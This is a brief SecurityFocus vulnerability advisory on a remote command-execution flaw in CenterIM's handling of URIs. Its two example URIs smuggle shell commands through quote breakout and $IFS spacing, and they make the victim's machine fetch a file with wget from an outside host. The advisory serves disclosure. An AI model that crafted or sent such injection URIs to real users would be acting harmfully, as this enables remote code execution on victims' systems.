Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability

An attacker can use an instant-message client to carry out attacks.

The following example URIs are available:

If the victim's browser is already open - http://www.example.com)';cd$IFS$HOME/Desktop;wget${IFS}http://www.example2.com;'(

If the victim's browser is not open - http://http://www.example.com/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://www.example2.com"







 

Privacy Statement
Copyright 2009, SecurityFocus